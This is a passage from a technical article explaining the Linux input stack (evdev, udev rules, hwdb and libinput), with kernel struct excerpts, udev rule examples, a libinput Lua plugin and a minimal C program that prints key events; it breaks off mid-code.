special driver, or on a live system dynamically by relying on
udev-hid-bpf
which will be invoked before the kernel handles HID.
evdev — Event Device
Let’s tackle the last piece of the exposed middle layer that we didn’t
explain yet: the Event Device common protocol, the evdev layer.
From what we’ve seen, we know that evdev is a standardization interface:
it decouples and abstracts the underlying devices. It could be a USB
keyboard, a Bluetooth pointer, or a PS/2 device, and all the user needs
to do is read from the evdev interface, without worrying about their
differences.
It works because evdev registers itself as the default input handler in
the input core, and the main job of most input drivers is to translate
their events to it:
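For reference, this is roughly how evdev hooks itself in (simplified from drivers/input/evdev.c; fields are trimmed and may differ between kernel versions):
static struct input_handler evdev_handler = {
	.events		= evdev_events,		/* receives event batches from the input core */
	.connect	= evdev_connect,	/* called for every matching input device */
	.disconnect	= evdev_disconnect,
	.name		= "evdev",
	.id_table	= evdev_ids,		/* matches every device */
};

static int __init evdev_init(void)
{
	return input_register_handler(&evdev_handler);
}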
When its “connect” event is fired, it creates the corresponding evdev
node in
/dev/input/eventN
. Furthermore, the info is also reflected
in sysfs within the
/sys/class/input/eventN
directory along with its
related
/sys/class/input/inputN
device created by the input core, which
it is a child of (
eventN
within
inputN
).
The evdev driver also supports certain ioctls to query
its internal state, let a client exclusively grab a
device (
EVIOCGRAB
), or change certain values. The list of ioctls can be found
here
within libevdev, though libevdev doesn’t support all of them (the list
can also be found in
include/linux/input.h
).
Let’s see what the evdev format is about, and how the input core
translates to it and generates the events.
The evdev protocol is stateful: it doesn’t forward everything to
user-space, but only does so when it notices a change. To inquire about
its current state one can rely on ioctls instead.
The format of evdev is composed of a series of
input_event
(from
include/linux/input.h
) which look like the structure below,
grouped in what’s called a sequence or a frame:
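Slightly simplified from include/uapi/linux/input.h (on recent kernels the timestamp is actually stored as separate seconds/microseconds fields):
struct input_event {
	struct timeval time;	/* timestamp of the event */
	__u16 type;		/* e.g. EV_KEY, EV_REL, EV_ABS, EV_SYN */
	__u16 code;		/* e.g. KEY_A, REL_X, ABS_MT_SLOT */
	__s32 value;		/* 0/1 for keys, delta for relative axes, position for absolute ones */
};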
Basically a timestamp along with a type-code pair and an associated
value. The type is the general category this event is part of,
and the code is the sub-category. For example, it could be a relative movement
(type), on the x-axis (code), of 1 unit (value). The available types of
events and codes can be found under
include/linux/input-event-codes.h
.
Each frame ends whenever a synchronization event comes up; the most
common is of type.code(value)
EV_SYN.SYN_REPORT(0)
. It’s the marker
that it’s time to make sense of the stream, the whole frame.
An example snapshot of a frame of an “absolute touchpad” would look
like this:
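Something along these lines, in the same type/code/value notation (a single finger landing on the pad; values illustrative):
EV_ABS  ABS_MT_TRACKING_ID   42
EV_ABS  ABS_MT_POSITION_X    1180
EV_ABS  ABS_MT_POSITION_Y    720
EV_KEY  BTN_TOUCH            1
EV_KEY  BTN_TOOL_FINGER      1
EV_ABS  ABS_X                1180
EV_ABS  ABS_Y                720
EV_SYN  SYN_REPORT           0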
As we’ve said, it’s stateful, so the events are only sent when there is a
state change, even when the hardware keeps resending the same event. So
for example, if a key is kept pressed, it won’t resend the event until
it’s released.
These events might seem simple on their own but are in fact quite
complex to handle, especially for touchpads. There are many features such as
pressure, multi-touch, and the tracking of different fingers, which need an
upper layer to make sense of it all. This is where libinput shines, and
we’ll see that later on. For now just keep in mind it’s a series of events.
So how do drivers use evdev to send events? We’ve talked about
input_event
before, but how does it work?
Well, first of all, before sending any event, the input driver needs, at
the registration phase, to advertise to the system what it’s capable of,
that is, what kind of events it can generate. These event “capabilities”,
as they’re called, are sets of bits that are also
inspectable in sysfs under
/sys/class/input/inputN/capabilities/
.
You’ll find the following types of capabilities:
ev
, set in
input_dev->evbit
, Which event types the device can generate (
EV_KEY
,
EV_REL
, etc.)
key
, set in
input_dev->keybit
, Which key/button codes it supports
rel
, set in
input_dev->relbit
, Which relative axes (e.g., REL_X, REL_WHEEL)
abs
, set in
input_dev->absbit
, Which absolute axes (e.g., ABS_X, ABS_Y)
led
, set in
input_dev->ledbit
, LED indicators (e.g., keyboard LEDs)
sw
, set in
input_dev->swbit
, Switch states (e.g., lid switch)
ff
, set in
input_dev->ffbit
, Force feedback capabilities
msc
, set in
input_dev->mscbit
, Miscellaneous events
snd
, set in
input_dev->sndbit
, Sound events
As you can see, it’s somewhat related to the HID capabilities in a sense,
but applies to all devices.
We’ve also seen these capabilities bits during our inspection of the
input core procfs interface
/proc/bus/input/
in the
B
field:
However, parsing the bits manually in procfs or sysfs would be cumbersome;
it’s better to rely on tools such as
libinput record
, check the
“Supported Events”
section:
As a note, the Properties can let us know whether we’re dealing with
a touchscreen
INPUT_PROP_DIRECT
, or a touchpad
INPUT_PROP_POINTER
,
and
INPUT_PROP_BUTTONPAD
also tells us that it’s a so-called clickpad
(no separate physical buttons but the whole touchpad clicks). These are
hints for libinput to properly handle different kinds of devices.
So after registering its capabilities, the input driver simply reports
its events by relying on the
input_event
function, or one of its
many wrappers:
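These wrappers are thin static inlines from include/linux/input.h; a driver's event path typically ends up doing something like this sketch:
input_report_key(dev, BTN_LEFT, 1);	 /* wraps input_event(dev, EV_KEY, BTN_LEFT, 1) */
input_report_rel(dev, REL_X, 5);	 /* wraps input_event(dev, EV_REL, REL_X, 5) */
input_report_abs(dev, ABS_PRESSURE, 30); /* wraps input_event(dev, EV_ABS, ABS_PRESSURE, 30) */
input_sync(dev);			 /* wraps input_event(dev, EV_SYN, SYN_REPORT, 0) */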
That’s mostly all there is to understanding evdev! There are multiple tools to help
debug evdev-related issues. We’ve seen
libinput record
. Similarly,
there’s the
evemu
suite with its record, device, play functions to
simulate and test devices, and
evtest
.
There’s also
evsieve
, a tool to
intercept and modify evdev events on the fly.
Along with these, the library libevdev, in C and python, is the most
used to integrate with evdev-related things.
udev & hwdb
After going through the kernel and exposed layers, we’re finally in
user-space!
The first component we’ll see is udev, since we mentioned its role
countless times in the previous sections.
Udev, or the dynamic user-space device manager, implemented as the
udev daemon
systemd-udevd
, has the role of taking action whenever a
uevent (
PF_NETLINK, NETLINK_KOBJECT_UEVENT
) is sent from the kernel
to user-space. We’ve seen a few of the possible actions it performs;
here’s a summary of the kind of things it does:
Load kernel modules based on the uevent MODALIAS
Set access rights on device nodes
Attach properties to devices on detection
Create symlinks so that devices have more predictable names
Keep track of device info in its internal db
Use its rule system to take any kind of action on plug/unplug of a device
The most important part is the last point: udev has a set of rules against
which it can match devices and their attributes and take all sorts of
actions based on that. The fields it has access to not only come from the
uevents but also from all related info on the system.
These rules, as is the convention for pretty much all big daemons these
days, are read from system locations such as
/usr/lib/udev/rules.d
,
/usr/local/lib/udev/rules.d
, and the volatile runtime in
/run/udev/rules.d
, and from the local admin directory of
/etc/udev/rules.d
which takes precedence over the other locations. The
directories contain files with a
.rules
extension and are processed and
ordered lexically (
01-example.rules
comes before
05-example.rules
).
Now the syntax of udev rules, which are mainly composed of matching
patterns and actions to perform or properties to set upon match, is
dense and complex (it even has branching). Only a deep study of the
udev(7)
man page will help. Yet, we can still learn the very basics of it to be
able to understand what’s happening.
Our approach will consist of first checking two examples, then getting a
general overview of the possible components of the syntax, and finally
talking about the particularities of that system.
The first example is quite simple: it runs a script when a specific
keyboard is plugged/unplugged.
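A hedged sketch of what such a rule could look like (the vendor/product IDs and the script path are made up for illustration; on "remove" the sysfs attributes may already be gone, hence the ENV match there):
ACTION=="add", SUBSYSTEM=="input", KERNEL=="event*", \
  ATTRS{idVendor}=="1a2c", ATTRS{idProduct}=="6004", \
  RUN+="/usr/local/bin/keyboard-hotplug.sh add"
ACTION=="remove", SUBSYSTEM=="input", KERNEL=="event*", \
  ENV{ID_VENDOR_ID}=="1a2c", ENV{ID_MODEL_ID}=="6004", \
  RUN+="/usr/local/bin/keyboard-hotplug.sh remove"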
The rule is pretty clear about what it does: on an “add” or “remove” action
for a specific match, it’ll execute a script. But you’ll also notice that the
match components such as SUBSYSTEM and ATTRS are things we’ve seen before
in previous traces of
udevadm info
, which is exactly the point.
udevadm info
will show us certain components we can use to match against.
The second example is a tad more complex: we will parse
/usr/lib/udev/rules.d/60-persistent-input.rules
. That file creates
a more persistent naming scheme for input devices in devtmpfs under
/dev/input/by-id
and
/dev/input/by-path/
. Here’s a simplified version
of it.
ACTION=="remove", GOTO="persistent_input_end"
SUBSYSTEM!="input", GOTO="persistent_input_end"# …# determine class name for persistent symlinks
ENV{ID_INPUT_KEYBOARD}=="?*", ENV{.INPUT_CLASS}="kbd"
ENV{ID_INPUT_MOUSE}=="?*", ENV{.INPUT_CLASS}="mouse"# …# by-id linksKERNEL=="event*", ENV{ID_BUS}=="?*", ENV{.INPUT_CLASS}=="?*",
ATTRS{bInterfaceNumber}=="|00",
SYMLINK+="input/by-id/$env{ID_BUS}-$env{ID_SERIAL}-event-$env{.INPUT_CLASS}"# by-path
ENV{.INPUT_CLASS}=="?*", KERNEL=="event*",
ENV{ID_PATH}=="?*",
SYMLINK+="input/by-path/$env{ID_PATH}-event-$env{.INPUT_CLASS}"# …LABEL="persistent_input_end"
We can see multiple things from this short example. First of all,
the branching mechanism with its use of
GOTO
whenever certain matches
don’t fit the specific use-case. We can also see the standard comparison
operators such as
==
and
!=
.
Then we see different variables/values that are either compared against
such as
SUBSYSTEM
,
ACTION
,
KERNEL
,
ATTRS{…}
,
ENV{}
, or
assigned such as
ENV{…}
,
GOTO
, or
SYMLINK
. The assignment seems
to either use
=
or
+=
.
Furthermore, from this example we can also see some glob-like pattern
matching, and string substitution within assignments.
Yet, overall the idea makes sense. We create a string variable based
on the type of input device we’re dealing with (prepending it with
.
means it’s only temporary), which we find in
ENV{…}
, the device
properties. Then for event devices we create two symlink files in
different directories “by-id” and “by-path”. For the by-id it’s composed
of the bus name, followed by the device name, “-event-“, and the input
class we’ve stored in the temporary variable.
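To see where these come from, here is roughly what udevadm info prints for such a keyboard (heavily trimmed; values illustrative):
> udevadm info /dev/input/event5
P: /devices/pci0000:00/.../0003:1A2C:6004.0001/input/input5/event5
N: input/event5
S: input/by-id/usb-SEMICO_USB_Keyboard-event-kbd
S: input/by-path/pci-0000:00:14.0-usb-0:2:1.0-event-kbd
E: DEVNAME=/dev/input/event5
E: SUBSYSTEM=input
E: ID_INPUT=1
E: ID_INPUT_KEYBOARD=1
E: ID_BUS=usb
E: ID_SERIAL=SEMICO_USB_Keyboard
E: ID_PATH=pci-0000:00:14.0-usb-0:2:1.0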
The lines starting with
E:
are device properties that are in
ENV{…}
;
their meaning can be found in the
udevadm(8)
manpage, which we’ll see more
of in other examples.
So from this, the device should be symlinked as
/dev/input/by-id/usb-SEMICO_USB_Keyboard-event-kbd
, which it indeed is.
That’s a neat example; it gives us a general idea of udev. Let’s continue
and try to get a more general idea of the udev syntax.
So far we’ve seen that the rules files contain key-value pairs, or
comments starting with
#
as is standard in most conf files, and
has operators that are either for comparison,
==
and
!=
, or for
assignment, we’ve seen
=
and
+=
.
The difference between these two assignment operators is that some
variables/keys are lists, and the
+=
appends to that list, while the
=
operator would basically empty the list and set only the single
value in it. Additionally, there are two other assignment operators
we haven’t seen: the
-=
to remove a value from a list, and the
:=
which sets a constant and disallows future changes.
How do we know if something is a list or a scalar value, and if the key can
be used in comparison or assignment? Well, it depends on the key itself;
the keys are listed in the man page
udev(7)
. We’ll see the most common ones,
but first let’s talk about the values.
The values assigned are always strings within double quotes, and use
the same escape mechanism that C and other languages use. udev also
allows case-insensitive comparison by preceding the string with “i”,
such as
i"case doesn't matter"
.
The strings also allow internal substitution with variables/keys, some
that can be set on the fly, from the match, or from a set of global
ones. It’s similar to a lot of languages:
"hello $kernel $env{ID_PATH}"
.
This is what we’ve seen in one of our examples.
Furthermore, if a string is used during matching, it can include
glob patterns, also the usual ones, such as
*
to match zero or more
characters,
?
to match a single character,
|
for the or separator,
and
[]
to match a set of characters. Obviously, these special characters
will need to be escaped if used as-is.
Now, as we said there are keys used to do matching/searching, and keys
that allow assigning values (list or not), yet what’s confusing is that
lots of keys can be used for both, but not all of them. A quick look at
udev(7)
to be sure doesn’t hurt.
Here are some common matching keys:
KERNEL
: kernel name
SUBSYSTEM
: the kernel subsystem the device is associated to
DRIVER
: the driver currently handling the device
ACTION
: Represents what’s happening on a device. Either
add/remove
when the device is created or removed,
bind/unbind
for the driver,
change
when something happens on a device such as a state change (ex:
eject, power plug, brightness),
offline/online
for memory and cpu,
move
when a device is renamed.
ATTR{attributename}
: match any sysfs attribute of the device
TAG
: arbitrary tags, mostly used for user-space special behavior
ENV{property_name}
: Context info, device properties, added by the
kernel or other udev rules associated with the device. They are not
environment variables, but do get passed as
env
to
RUN+=
commands.
PROGRAM
and
RESULT
: The first executes an external program and
if it’s successful then the match succeeds; the second checks the string
result of the last program and uses it as a comparator.
Still, there are variants of some of the above to allow a match with any
of the parents of the devices in the topological hierarchy, these include
KERNELS
,
SUBSYSTEMS
,
DRIVERS
, and
ATTRS
.
Now that we’ve dealt with the keys used for comparison, let’s see the common
assignment keys:
SYMLINK
: A list of symlinks to be created
ATTR{attributename}
: Value that should be set in sysfs
TAG
: A list of special attributes for user-space to act
upon. For example, systemd acts on
TAG+="systemd"
and will read
ENV{SYSTEMD_WANTS}
and interpret it as a unit dependency for the
device. It can be used to automatically start services.
ENV{property_name}
: Context info, device properties, of the device. If
the property name is prepended with a dot
.
, then it will only
temporarily be set.
OWNER
,
GROUP
,
MODE
: Set permissions on the device
RUN{type}
: A list of external programs to run. The type is optional
and defaults to “program”, but it can be “builtin”, which refers to
built-in plugins. Beware that
RUN
will time out, so it’s always better to
dispatch long-running processes from small starter scripts that exit
immediately.
systemd-run --user
is often used here to execute things
in a normal graphical session such as notifications.
IMPORT{type}
: Similar to
RUN
but used to import a set of variables (
ENV
)
depending on the type, can be “program”, “builtin”, “file”, “db”,
“parent”, “cmdline”.
LABEL
,
GOTO
: A label and goto to jump to it, creating branching.
The
RUN{builtin}
is a bit of an edge-case within udev since there are
many builtin modules and most of them are blackboxes that are hardly
documented. We know from
udevadm test-builtin --help
that these exist:
blkid Filesystem and partition probing
btrfs btrfs volume management
dissect_image Dissect Disk Images
factory_reset Factory Reset Mode
hwdb Hardware database
input_id Input device properties
keyboard Keyboard scancode mapping and touchpad/pointingstick characteristics
kmod Kernel module loader
net_driver Set driver for network device
net_id Network device properties
net_setup_link Configure network link
path_id Compose persistent device path
uaccess Manage device node user ACL
usb_id USB device properties
Unfortunately, what they do isn’t clear unless you step into the code of
udev-builtin
.
For example,
input_id
will set a series of
ENV
info on the device depending on what it thinks
it is. Here’s a relevant code snippet:
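Here is a heavily simplified sketch in the spirit of systemd's src/udev/udev-builtin-input_id.c (not the actual code; test_bit and set_property stand in for the real helpers, and the real logic checks many more capability bits):
/* decide what kind of input device this is from its capability bitmaps */
if (test_bit(EV_REL, ev_bits) && test_bit(REL_X, rel_bits) &&
    test_bit(EV_KEY, ev_bits) && test_bit(BTN_LEFT, key_bits))
        set_property(dev, "ID_INPUT_MOUSE", "1");

if (test_bit(EV_ABS, ev_bits) && test_bit(BTN_TOOL_FINGER, key_bits) &&
    !test_bit(BTN_TOOL_PEN, key_bits))
        set_property(dev, "ID_INPUT_TOUCHPAD", "1");

if (test_bit(EV_KEY, ev_bits) && test_bit(KEY_ENTER, key_bits))
        set_property(dev, "ID_INPUT_KEYBOARD", "1");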
And that’s just the tip of the iceberg of udev rules. The ones on
a real system are a monstrously big patchwork. The only way to visualize
all of them on your system, in the way they’ll be processed, is with
systemd-analyze cat-config udev/rules.d
.
Before getting on with actual examples and tools, let’s take some time
to talk about one of the most important built-in udev modules:
hwdb
,
the hardware db, or
systemd-hwdb
. It is an extra mechanism to write
rules for udev to add device properties (
ENV{}
).
The hardware db is a lookup table that lives in files with the
.hwdb
extension under the udev directory, in the
hwdb.d
sub-directory. These
key-value files are compiled, at
systemd-hwdb
startup, into a
hwdb.bin
file for
quick retrieval. They consist of matches on modalias-like keys followed by
a series of property assignments. Something like:
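A hedged, made-up example that remaps keys on one specific USB keyboard (the IDs and scancodes are illustrative; note the single leading space on the assignment lines):
# /etc/udev/hwdb.d/90-example-keyboard.hwdb
evdev:input:b0003v1A2Cp6004*
 KEYBOARD_KEY_70039=esc
 KEYBOARD_KEY_700e2=leftmeta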
The format is a simple series of match strings, one or multiple, followed by
assignment values on lines that start with a space. Match
strings can use globs, and they don’t really follow any
specific format other than
prefix:search criteria
. Yet, the question is:
how are these modalias-like strings used? The answer is, obviously,
that udev uses them via an
IMPORT
of the builtin hwdb to set certain
device properties based on the lookup. For example:
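Roughly how the stock rules do it (paraphrased, not verbatim from 60-evdev.rules):
KERNEL=="event*", \
  IMPORT{builtin}="hwdb 'evdev:name:$attr{device/name}:$attr{[dmi/id]modalias}'"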
So udev passes a set of parameters to hwdb, along with the device, and it
will return
ENV
properties to set. hwdb also has an accompanying command
line tool that works in a similar way and allows querying it. However, it
has no man page, as far as I can see, but the following args are allowed:
--filter or -f:
--device or -d:
--subsystem or -s:
--lookup-prefix or -p:
So for example when passing
--subsystem=usb
and a device, hwdb will get
the actual
MODALIAS
of the device, or construct one from the
idVendor
,
idProduct
, and
product
, then try to match it in its lookup table.
Anyhow, we won’t spend time breaking down the source code. Let’s just
add that since the
hwdb
lookup table is compiled ahead of time,
whenever entries are added or modified
systemd-hwdb
needs to be updated
or notified via:
systemd-hwdb update # compile the hwdb
Similarly, the same is true of udev. However, udev has a more granular
reload mechanism, either to reload rules or to re-emit events so that
they can be processed by the new rules:
udevadm trigger # re-emits all the uevents
udevadm trigger /sys/class/input/eventXYZ # only re-emit this device events
udevadm control --reload                  # reload all rules, but will only apply to new events
Let’s see more examples of
udevadm
, which is the main way to interface
with udev.
udevadm info
is used to gather information about devices; we’ve seen
it earlier in previous sections. It’s handy when writing udev rules. You can
pass it either a devtmpfs path, a sysfs path, a device ID, or a systemd
unit name of
.device
type (these are the
TAG+="systemd"
devices to
automatically load other units).
For example, we can walk and find the attribute hierarchy of a certain
device.
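For instance, using the keyboard's event node from earlier:
> udevadm info --attribute-walk /dev/input/event5 | less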
Another option is to rely on
udevadm monitor
, which is a live trace
of all the uevents being sent.
Yet another option is
udevadm test
to print the rules that will get
triggered on a certain device uevent. This is useful to check whether
the rules make sense and will get executed.
A last tip to remember when writing udev rules is that
ATTR{}
is
anything in the files of sysfs. So we can simply match like this:
> cat /sys/class/input/event5/device/name
SEMICO USB Keyboard
And the rule would be
ATTR{name}=="SEMICO USB Keyboard"
.
Finally, let’s give an honorable mention to the mdev and eudev projects,
which are udev-like but more compatible with other init systems.
libinput
Libinput is a wrapper over udev and evdev. It provides a centralized way
to perform device detection, device event handling, and input processing,
along with abstractions and a common set of facilities to make practical,
user-expected input handling easier. Today, libinput is
the major input library used by all graphical environments and toolkits;
it’s used by Xorg (through a driver) and Wayland compositors, so we’re
all probably using it indirectly.
Its basic mechanism works as you’d expect.
As far as udev is concerned, it relies on
libudev/sd-device
to
enumerate devices and listen to the kernel’s uevents. In particular, it
analyzes properties added by udev that help categorize devices and
override settings (
ID_INPUT
,
ID_INPUT_*
,
LIBINPUT_*
), and filters
which devices it is allowed to handle by looking at which “seat” they’re
associated with. The whole udev part can be skipped by manually adding
devices by path with
libinput_path_add_device
, but that’s a fallback scenario.
And when it comes to evdev, it gets handles to the corresponding
input stream devices, then continuously reads events and processes
them. This processing includes a lot of things such as scaling
touch coordinates, calculating pointer acceleration, debouncing
keys, etc. Finally, libinput returns these events through a unified
API, as events such as
LIBINPUT_EVENT_POINTER_BUTTON
,
LIBINPUT_EVENT_POINTER_MOTION
,
and
LIBINPUT_EVENT_POINTER_MOTION_ABSOLUTE
.
That also means it handles only the usual input devices such as mice,
keyboards, touchpads/clickpads, switches, trackpoints/pointing sticks,
touchscreens, and graphic tablets. It doesn’t handle joysticks, for
example, since these aren’t used for desktop environments but for games.
On top of that, it also implements higher-level behaviors such as:
Scrolling, three-finger drag, and tap-to-click behaviour
Gestures
We’ll see what these mean, but first, why is libinput needed? Can’t
udev and evdev be handled directly? Why have another layer of indirection?
The answer is twofold: to avoid having additional separate modules in the
upper stack such as in the X server, and because handling input devices
is messy and not as simple as taking evdev events as-is; they need a
bit more interpretation and cleanup.
Previously, before Wayland got traction, the X11 stack had specific
custom drivers, the xf86 input driver API, for each type of hardware and
use-case. Yet, these xf86 drivers could also share common functionalities
such as two-finger scrolling, which added confusion. This was mostly a
hack from the days before evdev existed, and there was a need for a library
independent of X11 that would centralize this responsibility, instead
of having it dispersed in different places. This makes it easier to
test each option, and to have the features interact with one another
(cross-device communication).
Now, why not handle it all directly? Well, because it’s messy. Multiple
devices have bad firmware and might send wrong capabilities and info
in their HID Report Descriptors, which will then be forwarded as-is
through evdev. Plus, handling these in each driver would be even
messier. For example, a device could say that the size or resolution of
the touchpad is one value while it’s actually another, or that the range
of valid inputs is 0 to 10 while it’s really 5 to 10. That’s why libinput
includes vendor-specific quirks handling in
/usr/share/libinput/
along with the help of hwdb, which we’ve seen earlier, which has
/usr/lib/udev/hwdb.d/60-evdev.hwdb
.
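For instance, a quirks entry of roughly this shape (illustrative, not copied from a real quirks file):
[Some Bluetooth Keyboard]
MatchUdevType=keyboard
MatchBus=bluetooth
AttrKeyboardIntegration=external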
And this says that when a keyboard’s bus is over Bluetooth, it should
add the libinput attribute to say it’s an external keyboard.
The
60-evdev.hwdb
is mostly for touchpad axes; the device properties
it sets will look like this:
EVDEV_ABS_<axis>=<min>:<max>:<res>:<fuzz>:<flat>
# where <axis> is the hexadecimal EV_ABS code as listed in linux/input.h and
# min, max, res, fuzz, flat are the decimal values to the respective fields of
# the struct input_absinfo as listed in linux/input.h. If a field is missing
# the field will be left as-is. Not all fields need to be present. e.g. ::45
# sets the resolution to 45 units/mm.
# resolution: it is given in units per millimeter and thus tells us the
# size of the device. in the above case: (5112 - 1024)/42 means the device
# is 97mm wide. The resolution is quite commonly wrong, a lot of axis
# overrides need the resolution changed to the correct value.
Furthermore, apart from quirks, there are hardware physical issues,
such as the fact that some touchpads send out events before the finger
even touches them, or how to handle the difference in pressure on them,
or what to do to track different fingers on multitouch (MT) hardware
which requires handling evdev tracking ID and slots.
Here’s a two-finger scroll example; see how complex that is:
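As a hedged illustration, here is just one evdev frame during such a scroll, with two multi-touch slots active (values illustrative); libinput has to turn a stream of these into smooth scroll events:
EV_ABS  ABS_MT_SLOT          0
EV_ABS  ABS_MT_POSITION_Y    1402
EV_ABS  ABS_MT_SLOT          1
EV_ABS  ABS_MT_POSITION_Y    1419
EV_ABS  ABS_Y                1402
EV_KEY  BTN_TOOL_FINGER      0
EV_KEY  BTN_TOOL_DOUBLETAP   1
EV_SYN  SYN_REPORT           0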
Additionally, you also have misbehaving keyboards, with bad
firmware, or buttons that are old, get stuck, or send the same
event multiple times (so-called contact bouncing or chatter). We
need a mechanism to decide whether an event is valid or not; that’s
called debouncing, and libinput does it out-of-the-box for us
(
see
),
which is truly impressive. This feature, with the help of the upper stack,
may also help people that have certain disabilities with involuntary
muscle movement.
So, for many reasons, libinput is indispensable!
We’ve already covered some of its features, let’s see more.
One of the interesting parts of libinput is that it’s minimal in how
it decides to access external things. As we said, you can either opt
for devices coming from udev, or manually pass them by path; both will
create libinput internal objects (pointer, keyboard, etc.). Furthermore,
libinput has no configuration files: it’s up to the caller to decide
how to configure each device, and as we’ll see, Wayland compositors and X11
have different ways. Similarly, it leaves the opening of evdev character
devices up to the caller implementation, usually either opening them
manually, which requires root privileges, or via
systemd-logind
or
seatd
, services
which will automatically pass back the file descriptors of the evdev
devices associated with the current “seat”.
A seat is a collection of input devices associated with a user
session. That seems redundant, since most machines have only one seat,
yet it only truly makes sense in multi-seat machines: one machine,
multiple input devices, with multiple users. Still, it takes this
particular use-case into consideration.
> libinput list-devices
…
Device: SEMICO USB Keyboard
Kernel: /dev/input/event5
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard
…
> loginctl seat-status # will list all input devices in the seat hierarchy
As you would’ve guessed, the safest and most favored way to get access
to evdev event file descriptors is through the delegation that
systemd-logind
provides. This is done in the code by implementing
open_restricted
to call the dbus service.
The seat is assigned with the
ENV{ID_SEAT}
udev property, which can be
controlled with the
loginctl
command to permanently attach a device
to a seat.
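A hedged example of doing so (the seat name and device path are illustrative):
> loginctl attach seat1 /sys/class/input/event5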
There are alternatives to
logind
such as
elogind
and
seatd
that don’t depend on
systemd.
Another detail is that we’ve seen that the same physical device can
appear as multiple input devices on the system. With the help of udev,
libinput gets the device property
LIBINPUT_DEVICE_GROUP
to group them, so
that we can have the whole group under a single seat, which is more
logical than giving access to only part of a physical device.
And from
libinput list-devices
, look at the
Group
part:
Device: SEMICO USB Keyboard
Kernel: /dev/input/event5
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard
…
Device: SEMICO USB Keyboard Consumer Control
Kernel: /dev/input/event6
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard pointer
…
Device: SEMICO USB Keyboard System Control
Kernel: /dev/input/event7
Id: usb:1a2c:6004
Group: 6
Seat: seat0, default
Capabilities: keyboard
You can get more info on this by checking the related udev rule in
80-libinput-device-groups.rules
, which calls the built-in program
libinput-device-group
with the sysfs mount point. The
IMPORT{program}
basically runs a helper program located in the
/usr/lib/udev/
directory.
As far as the technical features are concerned, there are the ones which
we listed earlier, so let’s explain the rest of them.
It offers full clickpad management. A clickpad (
INPUT_PROP_BUTTONPAD
)
is basically a touchpad with a single button, which we might not notice at
first because depending on where we press in the “software button area”
at the bottom, we have different behavior. That’s exactly the behavior
that libinput facilitates. It also handles what happens when a finger
enters or exits that area, those sorts of edge cases.
Furthermore, libinput handles tap-to-click, be it a one-finger tap for
left click, two fingers for right click, and a three-finger tap for
middle click. While that seems simple in theory, libinput has to draw
the line between what is considered a tap and what is considered a finger
drag/move; indeed, our fingers aren’t very stable in the real world.
Unfortunately, by default libinput disables tapping when there are other
methods to trigger button clicks, but it can always be enabled again.
When talking about multiple fingers, the hardware needs to support
it obviously, but also libinput needs to track each one individually,
which is done via evdev tracking ID and slots, what we call multi-touch
handling or MT.
Within multi-touch we have the concept of “gestures” and libinput supports
two standard ones: swiping, with fingers going in the same direction, and
pinching, when fingers move apart or towards each other.
Similarly, there are also different scrolling use-cases supported
by libinput: two-finger scrolling, similar to a swipe; edge scrolling,
where a specific area on the trackpad is used for scrolling; and
on-button scrolling, which scrolls while a button is pressed just by
moving the finger.
The scrolling can either be horizontal or vertical. The user also has
a choice between natural scrolling and traditional scrolling: natural
scrolling matches the motion of the content, like on a phone, and traditional
scrolling matches the scroll bar direction, so going downward will move
the page downward.
One thing libinput doesn’t provide when it comes to scrolling is kinetic
scrolling, that is, scrolling that keeps going and decelerates after the
fingers are lifted, based on how fast they were moving. However, it allows widget libraries to implement it by relying
on the
libinput_event_pointer_get_axis_source()
function.
On top of all this, libinput offers palm and thumb detection to disable
the clickpad/touchpad when typing, or ignore a thumb in the corner or
accidental touches while other fingers are moving. It achieves this by
detecting the different pressure, speed, or touch sizes reported by evdev,
along with where they are happening (exclusion zones).
It’s also possible to automatically disable the touchpad when typing,
or when the lid is closed.
Lastly, libinput has Lua plugins in
/usr/lib/libinput/plugins/
and
/etc/libinput/plugins
. As with other quirk fixing mechanisms in
udev and the quirk directory, the plugins are there for the last few
unfixable issues. They can be used to override evdev events.
libinput:register(1) -- register plugin version 1
libinput:connect("new-evdev-device", function(_, device)
    if device:vid() == 0x046D and device:pid() == 0xC548 then
        device:connect("evdev-frame", function(_, frame)
            for _, event in ipairs(frame.events) do
                if event.type == evdev.EV_REL and
                   (event.code == evdev.REL_HWHEEL or
                    event.code == evdev.REL_HWHEEL_HI_RES) then
                    event.value = -event.value
                end
            end
            return frame
        end)
    end
end)
For example, the above script will reverse the horizontal scroll wheel
(
EV_REL.REL_HWHEEL
) event value for a certain device vendor and
product ID.
We’ve covered most of the libinput features, now let’s see how to debug
and interface with it.
The main command line interface is
libinput
; as we’ve seen, it can
list-devices
, which gives a quick summary of the devices it knows about
and on which seat they are connected. Most other sub-commands are there
for debugging and testing.
libinput debug-gui
: a graphical tool mostly to debug touchpads
libinput debug-events
: a CLI tool to debug all events as they are
interpreted by libinput; it’s similar to
evtest
or
xev
in Xorg
libinput record
and
libinput replay
: used to record devices and later simulate them
again. This is amazing if you have a bug and want others to be
able to replicate it on their machines. This is similar to how
hid-tools
works.
libinput measure
: mostly used for touchpads, to measure things such
as pressure, touch size, tap to click time, etc..
The other way to interface with libinput is programmatically. Here’s
the simplest complete example I could come up with:
#include <libinput.h>
#include <libudev.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>

static int open_restricted(const char *path, int flags, void *user_data)
{
	int fd = open(path, flags);
	if (fd < 0)
		fprintf(stderr, "Failed to open %s (%s)\n", path, strerror(errno));
	return fd;
}

static void close_restricted(int fd, void *user_data)
{
	close(fd);
}

static const struct libinput_interface interface = {
	.open_restricted = open_restricted,
	.close_restricted = close_restricted,
};

int main(void)
{
	struct udev *udev = udev_new();
	if (!udev) {
		fprintf(stderr, "Failed to create udev\n");
		return 1;
	}

	struct libinput *li = libinput_udev_create_context(&interface, NULL, udev);
	if (!li) {
		fprintf(stderr, "Failed to create libinput context\n");
		return 1;
	}

	if (libinput_udev_assign_seat(li, "seat0") != 0) {
		fprintf(stderr, "Failed to assign seat\n");
		return 1;
	}

	struct libinput_event *event;
	while (1) {
		libinput_dispatch(li);
		event = libinput_get_event(li);
		if (!event) {
			usleep(10000);
			continue;
		}

		if (libinput_event_get_type(event) == LIBINPUT_EVENT_KEYBOARD_KEY) {
			struct libinput_event_keyboard *k = libinput_event_get_keyboard_event(event);
			uint32_t key = libinput_event_keyboard_get_key(k);
			enum libinput_key_state state = libinput_event_keyboard_get_key_state(k);

			printf("Key %u is %s\n", key,
			       state == LIBINPUT_KEY_STATE_PRESSED ? "PRESSED" : "RELEASED");
		}

